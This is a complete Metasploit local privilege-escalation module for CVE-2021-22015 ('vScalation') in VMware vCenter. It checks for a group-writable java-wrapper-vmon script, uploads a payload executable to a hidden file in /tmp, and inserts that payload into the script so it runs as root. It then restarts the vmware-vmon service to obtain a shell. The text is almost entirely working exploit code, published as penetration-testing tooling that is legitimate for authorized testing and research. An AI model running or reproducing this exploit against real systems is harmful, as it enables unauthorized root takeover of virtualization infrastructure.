VMware vCenter vScalation Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ManualRanking  
  
include Msf::Post::Linux::Priv  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VMware vCenter vScalation Priv Esc',  
'Description' => %q{  
This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the  
/usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the  
cis group to write to the file, which will execute as root on vmware-vmon service  
restart or host reboot.  
  
This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.  
The following versions should be vulnerable:  
vCenter 7.0 before U2c  
vCenter 6.7 before U3o  
vCenter 6.5 before U3q  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'Yuval Lazar' # original PoC, analysis  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'References' => [  
[ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],  
[ 'CVE', '2021-22015' ],  
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]  
],  
'DisclosureDate' => '2021-09-21',  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'WfsDelay' => 1800 # 30min  
},  
'Notes' => {  
'Stability' => [CRASH_SERVICE_DOWN],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],  
'AKA' => ['vScalation']  
}  
)  
)  
register_advanced_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])  
]  
end  
  
# Simplify pulling the writable directory variable  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def java_wrapper_vmon  
'/usr/lib/vmware-vmon/java-wrapper-vmon'  
end  
  
def check  
group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")  
if writable?(java_wrapper_vmon) && group_owner == 'cis'  
return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")  
end  
  
CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")  
end  
  
def exploit  
# Check if we're already root  
if is_root? && !datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'  
end  
  
# Make sure we can write our exploit and payload to the local system  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
# backup the original file  
@backup = read_file(java_wrapper_vmon)  
path = store_loot(  
'java-wrapper-vmon.text',  
'text/plain',  
rhost,  
@backup,  
'java-wrapper-vmon.text'  
)  
print_good("Original #{java_wrapper_vmon} backed up to #{path}")  
  
# Upload payload executable  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"  
print_status("Writing payload to #{payload_path}")  
upload_and_chmodx payload_path, generate_payload_exe  
register_files_for_cleanup payload_path  
  
# write trojaned file  
# we want to write our payload towards the top to ensure it gets run  
# writing it at the bottom of the file results in the payload not being run  
print_status("Writing trojaned #{java_wrapper_vmon}")  
write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))  
  
# try to restart the service  
print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')  
service_restart = cmd_exec('systemctl restart vmware-vmon.service')  
# one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files  
if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')  
print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')  
end  
print_status("Waiting #{datastore['WfsDelay']} seconds for shell")  
end  
  
def cleanup  
unless @backup.nil?  
print_status("Replacing trojaned #{java_wrapper_vmon} with original")  
write_file(java_wrapper_vmon, @backup)  
end  
super  
end  
end  
`